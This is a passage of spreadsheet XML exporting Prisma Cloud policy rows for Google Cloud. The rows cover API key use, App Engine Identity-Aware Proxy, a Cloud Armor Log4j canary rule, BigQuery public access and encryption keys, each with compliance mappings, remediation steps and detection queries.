        <is>
          <t>NS-8</t>
        </is>
      </c>
      <c r="S2669" t="inlineStr"/>
      <c r="T2669" t="b">
        <v>0</v>
      </c>
      <c r="U2669" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2669" t="inlineStr">
        <is>
          <t>gcloud-api-key</t>
        </is>
      </c>
      <c r="W2669" t="inlineStr">
        <is>
          <t>This policy identifies GCP projects where API keys are created. Keys are insecure because they can be viewed publicly, such as from within a browser, or they can be accessed on a device where the key resides. To avoid the security risk in using API keys, it is recommended to use standard authentication flow instead.
Note: There are limited cases where API keys are more appropriate. For example, if there is a mobile application that needs to use the Google Cloud Translation API, but doesn't otherwise need a backend server, API keys are the simplest way to authenticate to that API. If a business requires API keys to be used, then the API keys should be secured using appropriate IAM policies.</t>
        </is>
      </c>
      <c r="X2669" t="inlineStr">
        <is>
          <t>Use of API keys is generally considered as less secure authentication mechanism and should be avoided. A secure authentication mechanism should be used. Follow the below mentioned URL to evaluate an alternate, suitable authentication mechanism:
https://cloud.google.com/endpoints/docs/openapi/authentication-method
To delete an API Key:
1. Log in to google cloud console
2. Navigate to section 'Credentials', under 'APIs &amp; Services'.
3. To delete API Key, go to 'API Keys' section, click the Actions button (three dots) in front of key name.
4. Click on ‘Delete API key’ button.
5. In the 'Delete credential' dialog, click 'DELETE' button.
Note: Deleting API keys might break dependent applications. It is recommended to thoroughly review and evaluate the impact of API key before deletion.</t>
        </is>
      </c>
      <c r="Y2669" t="inlineStr"/>
      <c r="Z2669" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-api-key' as X; count(X) greater than 0</t>
        </is>
      </c>
      <c r="AA2669" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2669" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2669" t="inlineStr">
        <is>
          <t>PC-GCP-API-944</t>
        </is>
      </c>
      <c r="AD2669" t="b">
        <v>1</v>
      </c>
      <c r="AE2669" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2669" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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Tuan's Alert Rule - Notifications:email, AccountGroups:compute-zw-rbac;,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69" t="inlineStr">
        <is>
          <t>80e46dc6-4ebf-4cc0-b29b-6cfc77414577</t>
        </is>
      </c>
      <c r="AI2669" t="inlineStr">
        <is>
          <t>78223e67-44b1-4a51-aca7-00e7aa37f015</t>
        </is>
      </c>
      <c r="AJ2669" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2669" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2670">
      <c r="A2670" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2024.2, CIS v1.3.0 (GCP), Secure Controls Framework (SCF) - 2022.2.1, New Zealand Information Security Manual (NZISM v3.4), SOC 2, Sarbanes Oxley Act (SOX), DORA, Sarbanes Oxley Act (SOX), Risk Management in Technology (RMiT), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, SOC 2, CIS v2.0.0 (GCP) Level 2, CIS v3.0.0 (GCP) Level 2, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 1, SOC 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2670" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2670" s="2" t="inlineStr"/>
      <c r="D2670" t="inlineStr"/>
      <c r="E2670" t="inlineStr"/>
      <c r="F2670" t="inlineStr"/>
      <c r="G2670" t="b">
        <v>0</v>
      </c>
      <c r="H26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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2670" t="inlineStr">
        <is>
          <t>gcloud-api-key</t>
        </is>
      </c>
      <c r="K2670" t="inlineStr">
        <is>
          <t>GCP API key not restricting any specific API</t>
        </is>
      </c>
      <c r="L2670" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2670" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2670" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2670" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2670" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2670" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2670" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2670" t="inlineStr"/>
      <c r="T2670" t="b">
        <v>0</v>
      </c>
      <c r="U2670" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2670" t="inlineStr">
        <is>
          <t>gcloud-api-key</t>
        </is>
      </c>
      <c r="W2670" t="inlineStr">
        <is>
          <t>This policy identifies GCP API keys that are not restricting any specific APIs. API keys are insecure because they can be viewed publicly, such as from within a browser, or they can be accessed on a device where the key resides. It is recommended to restrict API keys to use (call) only APIs required by an application.</t>
        </is>
      </c>
      <c r="X2670" t="inlineStr">
        <is>
          <t>1. Log in to google cloud console
2. Navigate to 'Credentials', Under service 'APIs &amp; Services'
3. In the section 'API Keys', Click on the reported 'API Key Name'
4. In the 'Key restrictions' section go to 'API restrictions'.
5. Select the 'Restrict key' and from the drop-down, choose an API.
6. Click 'SAVE'.
Note: Do not set 'API restrictions' to 'Google Cloud APIs', as this option allows access to all services offered by Google cloud.</t>
        </is>
      </c>
      <c r="Y2670" t="inlineStr"/>
      <c r="Z2670" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-api-key' AND json.rule = restrictions.apiTargets does not exist</t>
        </is>
      </c>
      <c r="AA2670" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2670" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2670" t="inlineStr">
        <is>
          <t>PC-GCP-API-842</t>
        </is>
      </c>
      <c r="AD2670" t="b">
        <v>1</v>
      </c>
      <c r="AE2670" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2670" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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0" t="inlineStr">
        <is>
          <t>2e66484c-206b-4f23-a62f-28135c22704b</t>
        </is>
      </c>
      <c r="AI2670" t="inlineStr">
        <is>
          <t>08224ba2-a172-4ab7-ab6c-b940a372fc25</t>
        </is>
      </c>
      <c r="AJ2670" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2670" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2671">
      <c r="A2671" t="inlineStr">
        <is>
          <t>NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), New Zealand Information Security Manual (NZISM v3.4), Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v7.1</t>
        </is>
      </c>
      <c r="B2671" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2671" s="2" t="inlineStr"/>
      <c r="D2671" t="inlineStr"/>
      <c r="E2671" t="inlineStr"/>
      <c r="F2671" t="inlineStr"/>
      <c r="G2671" t="b">
        <v>0</v>
      </c>
      <c r="H26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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2671" t="inlineStr">
        <is>
          <t>gcloud-app-engine</t>
        </is>
      </c>
      <c r="K2671" t="inlineStr">
        <is>
          <t>GCP App Engine Identity-Aware Proxy is disabled</t>
        </is>
      </c>
      <c r="L2671" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2671" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2671" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2671" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2671" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2671" t="inlineStr">
        <is>
          <t>16</t>
        </is>
      </c>
      <c r="R2671" t="inlineStr">
        <is>
          <t>16.1</t>
        </is>
      </c>
      <c r="S2671" t="inlineStr"/>
      <c r="T2671" t="b">
        <v>0</v>
      </c>
      <c r="U2671" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2671" t="inlineStr">
        <is>
          <t>gcloud-app-engine-application</t>
        </is>
      </c>
      <c r="W2671" t="inlineStr">
        <is>
          <t>This policy identifies GCP App Engine applications for which Identity-Aware Proxy(IAP) is disabled.  IAP is used to enforce access control policies for applications and resources. It works with signed headers or the App Engine standard environment Users API to secure your app. It is recommended to enable Identity-Aware Proxy for securing the App engine.
Reference: https://cloud.google.com/iap/docs/concepts-overview</t>
        </is>
      </c>
      <c r="X2671" t="inlineStr">
        <is>
          <t>To enabled IAP for a GCP project follow the below steps provided,
Link: https://cloud.google.com/iap/docs/app-engine-quickstart#enabling_iap</t>
        </is>
      </c>
      <c r="Y2671" t="inlineStr"/>
      <c r="Z2671" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-app-engine-application' AND json.rule = servingStatus equals SERVING and (iap does not exist or iap.enabled does not exist or iap.enabled is false)</t>
        </is>
      </c>
      <c r="AA2671" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2671" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2671" t="inlineStr">
        <is>
          <t>PC-GCP-APP-737</t>
        </is>
      </c>
      <c r="AD2671" t="b">
        <v>1</v>
      </c>
      <c r="AE2671" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2671" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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1" t="inlineStr">
        <is>
          <t>6c75753f-628b-44fa-9663-18dc39bc2272</t>
        </is>
      </c>
      <c r="AI2671" t="inlineStr">
        <is>
          <t>8a53ac93-3a12-40f6-b2f9-95a451a0977a</t>
        </is>
      </c>
      <c r="AJ2671" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2671" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2672">
      <c r="A2672" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, NYDFS 23 CRR-NY 500.0, Copy of CIS Controls v8, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, NIST CSF v2.0, CRI Profile v2.0, NIST CSF v2.0, TX-RAMP Level 1, CIS Controls v8.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), CIS Controls v7.1, DORA, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2672" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2672" s="2" t="inlineStr"/>
      <c r="D2672" t="inlineStr"/>
      <c r="E2672" t="inlineStr"/>
      <c r="F2672" t="inlineStr"/>
      <c r="G2672" t="b">
        <v>1</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2672" t="inlineStr">
        <is>
          <t>gcloud-armor</t>
        </is>
      </c>
      <c r="K2672" t="inlineStr">
        <is>
          <t>GCP Cloud Armor policy not configured with cve-canary rule</t>
        </is>
      </c>
      <c r="L2672" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2672" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2672" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2672" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2672" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2672" t="inlineStr">
        <is>
          <t>CIS Control 4</t>
        </is>
      </c>
      <c r="R2672" t="inlineStr">
        <is>
          <t>4.6</t>
        </is>
      </c>
      <c r="S2672" t="inlineStr"/>
      <c r="T2672" t="b">
        <v>0</v>
      </c>
      <c r="U2672" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2672" t="inlineStr">
        <is>
          <t>gcloud-armor-security-policy</t>
        </is>
      </c>
      <c r="W2672" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Armor rules where cve-canary is not enabled. Preconfigured WAF rule called "cve-canary" can help detect and block exploit attempts of CVE-2021-44228 and CVE-2021-45046 to address the Apache Log4j vulnerability. It is recommended to create a Cloud Armor security policy with rule blocking Apache Log4j exploit attempts.
Reference : https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability</t>
        </is>
      </c>
      <c r="X2672" t="inlineStr">
        <is>
          <t>To Update Existing rules follow the below steps,
1. Login to GCP console
2. Navigate to 'Cloud Armor' from service 'Network Security'(Left Panel)
3. Click on the alerted policy
4. Click on the pencil icon on the rule to edit the rule
5. Under 'Mode', select 'Advanced mode', add expression "evaluatePreconfiguredExpr('cve-canary')"
6. Under 'Action', select 'Deny' to block the exploit
7. Click on 'Update'
To Add rule follow the below steps,
1. Login to GCP console
2. Navigate to 'Cloud Armor' from service 'Network Security'(Left Panel)
3. Click on the alerted policy
4. Click on 'Add rule'
5. Under 'Mode', select 'Advanced mode', add expression "evaluatePreconfiguredExpr('cve-canary')"
6. Under 'Action', select 'Deny' to block the exploit
7. Update other details and click on 'Add' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-cloud-armor-prevents-message-lookup-in-log4j2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-cloud-armor-prevents-message-lookup-in-log4j2</t>
        </is>
      </c>
      <c r="Y2672" t="inlineStr"/>
      <c r="Z2672" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-armor-security-policy' AND json.rule = type does not equal ignore case CLOUD_ARMOR_EDGE and (rules[*].match.expr.expression does not contain cve-canary or rules[?any(match.expr.expression contains cve-canary and action equals allow)] exists)
{"category":"Networking","resourceTypes":["google_compute_security_policy"]}</t>
        </is>
      </c>
      <c r="AA2672" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2672" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2672" t="inlineStr">
        <is>
          <t>PC-GCP-GAS-828-CKV_GCP_73</t>
        </is>
      </c>
      <c r="AD2672" t="b">
        <v>1</v>
      </c>
      <c r="AE2672" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2672" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>3045acbb-395c-45a0-980b-7e9e605ceaa5</t>
        </is>
      </c>
      <c r="AI2672" t="inlineStr">
        <is>
          <t>67f7e9ec-ff60-4a77-98f0-a102a1352fda</t>
        </is>
      </c>
      <c r="AJ2672" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2672" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2673">
      <c r="A2673" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Rehan, Insurance Regulatory And Development Authority Of India, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], Matt's ATT&amp;ACK, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, CIS v2.0.0 (GCP) Level 1, ITSG-33, ISO 27002:2022, Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), CIS v1.3.0 (GCP), ITSG-33, TX-RAMP Level 2, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Brazilian Data Protection Law (LGPD), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Copy of ACSC Information Security Manual (ISM)-clone, ITSG-33, CIS Controls v8, SOC 2, NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), CIS v1.2.0 (GCP), CIS v3.0.0 (GCP) Level 1, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Australian Energy Sector Cyber Security Framework (AESCSF), HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, PCI DSS v4.0, NIST SP 800-172, PCI DSS v3.2.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), TX-RAMP Level 2, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), CIS v1.1.0 (GCP), kfirdaus AWS Account-CS, NIST 800-53 Rev 5, HIPAA, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2673" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2673" s="2" t="inlineStr"/>
      <c r="D2673" t="n">
        <v>0</v>
      </c>
      <c r="E2673" t="n">
        <v>1</v>
      </c>
      <c r="F2673" t="n">
        <v>0</v>
      </c>
      <c r="G2673" t="b">
        <v>1</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2673" t="inlineStr">
        <is>
          <t>gcloud-bigquery</t>
        </is>
      </c>
      <c r="K2673" t="inlineStr">
        <is>
          <t>GCP BigQuery dataset is publicly accessible</t>
        </is>
      </c>
      <c r="L2673" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2673" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2673" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2673" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2673" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2673" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2673" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2673" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2673" t="b">
        <v>0</v>
      </c>
      <c r="U2673" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2673" t="inlineStr">
        <is>
          <t>gcloud-bigquery-dataset-list</t>
        </is>
      </c>
      <c r="W2673" t="inlineStr">
        <is>
          <t>This policy identifies BigQuery datasets that are anonymously or publicly accessible. Granting permissions to allUsers or allAuthenticatedUsers allows anyone to access the dataset. Such access might not be desirable if sensitive data is being stored in the dataset. So it is recommended to not allow anonymous and/or public access to BigQuery datasets.</t>
        </is>
      </c>
      <c r="X2673" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate to service 'BigQuery'(Left Panel)
3. Under the 'Explorer' section, search for the reported BigQuery dataset and select 'Open' from the kebab menu
4. Click on dropdown 'SHARING' and select 'Permissions'
5. In 'Filter', search for 'allUsers' or 'allAuthenticatedUsers', review each attached role and click the delete icon
6. On the popup 'Remove role from principal?', select the checkbox and click on 'REMOVE' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-3</t>
        </is>
      </c>
      <c r="Y2673" t="inlineStr"/>
      <c r="Z2673" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-bigquery-dataset-list' AND json.rule = iamPolicy.bindings[?any(members[*] equals "allUsers" or members[*] equals "allAuthenticatedUsers")] exists
{"category":"General","resourceTypes":["google_bigquery_dataset"]}</t>
        </is>
      </c>
      <c r="AA2673" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2673" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2673" t="inlineStr">
        <is>
          <t>PC-GCP-BGQ-544-CKV_GCP_15</t>
        </is>
      </c>
      <c r="AD2673" t="b">
        <v>1</v>
      </c>
      <c r="AE2673" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2673" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>181a00f7-9ca4-45a7-9e2a-b8ebd12223ff</t>
        </is>
      </c>
      <c r="AI2673" t="inlineStr">
        <is>
          <t>c347d096-1c4b-4605-8eea-cbf1343ce6c7</t>
        </is>
      </c>
      <c r="AJ2673" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2673" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2674">
      <c r="A2674" t="inlineStr">
        <is>
          <t>HIPAA, CIS v2.0.0 (GCP) Level 2, Secure Controls Framework (SCF) - 2022.2.1, CIS v3.0.0 (GCP) Level 2, Risk Management in Technology (RMiT), HIPAA, Risk Management in Technology (RMiT), NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX)</t>
        </is>
      </c>
      <c r="B2674" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2674" s="2" t="inlineStr"/>
      <c r="D2674" t="inlineStr"/>
      <c r="E2674" t="inlineStr"/>
      <c r="F2674" t="inlineStr"/>
      <c r="G2674" t="b">
        <v>1</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2674" t="inlineStr">
        <is>
          <t>gcloud-bigquery</t>
        </is>
      </c>
      <c r="K2674" t="inlineStr">
        <is>
          <t>GCP BigQuery Dataset not configured with default CMEK</t>
        </is>
      </c>
      <c r="L2674" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2674" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2674" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2674" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2674" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2674" t="inlineStr">
        <is>
          <t>SOX Section 302</t>
        </is>
      </c>
      <c r="R2674" t="inlineStr">
        <is>
          <t>Section 302.4</t>
        </is>
      </c>
      <c r="S2674" t="inlineStr"/>
      <c r="T2674" t="b">
        <v>0</v>
      </c>
      <c r="U2674" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2674" t="inlineStr">
        <is>
          <t>gcloud-bigquery-dataset-list</t>
        </is>
      </c>
      <c r="W2674" t="inlineStr">
        <is>
          <t>This policy identifies BigQuery Datasets that are not configured with default CMEK. Setting a Default Customer-managed encryption key (CMEK) for a data set ensures any tables created in the future will use the specified CMEK if none other is provided. It is recommended to configure all BigQuery Datasets with default CMEK.</t>
        </is>
      </c>
      <c r="X2674" t="inlineStr">
        <is>
          <t>To configure default Customer-managed encryption key (CMEK), use following command for "bq" utility
bq update --default_kms_key=&lt;CMEK&gt; &lt;DATASET_ID&gt;
Please refer to URL mentioned below for more details on the bq update command:
https://cloud.google.com/bigquery/docs/reference/bq-cli-reference#bq_update</t>
        </is>
      </c>
      <c r="Y2674" t="inlineStr"/>
      <c r="Z2674" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-bigquery-dataset-list' AND json.rule = defaultEncryptionConfiguration.kmsKeyName does not exist</t>
        </is>
      </c>
      <c r="AA2674" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2674" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2674" t="inlineStr">
        <is>
          <t>PC-GCP-BGQ-929</t>
        </is>
      </c>
      <c r="AD2674" t="b">
        <v>1</v>
      </c>
      <c r="AE2674" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2674" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>a79dd0e7-2025-4676-abee-acfd493e32cc</t>
        </is>
      </c>
      <c r="AI2674" t="inlineStr">
        <is>
          <t>811400f5-5ea9-4d1b-b706-f3f71f4b1f91</t>
        </is>
      </c>
      <c r="AJ2674" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2674" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2675">
      <c r="A2675" t="inlineStr"/>
      <c r="B2675" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2675" s="2" t="inlineStr"/>
      <c r="D2675" t="inlineStr"/>
      <c r="E2675" t="inlineStr"/>
      <c r="F2675" t="inlineStr"/>
      <c r="G2675" t="b">
        <v>1</v>
      </c>
      <c r="H267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75" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2675" t="inlineStr">
        <is>
          <t>gcloud-bigquery</t>
        </is>
      </c>
      <c r="K2675" t="inlineStr">
        <is>
          <t>GCP BigQuery Table not encrypted with CMEK</t>
        </is>
      </c>
      <c r="L2675" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2675" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2675" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2675" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2675" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2675" t="inlineStr"/>
      <c r="R2675" t="inlineStr"/>
      <c r="S2675" t="inlineStr"/>
      <c r="T2675" t="b">
        <v>0</v>
      </c>
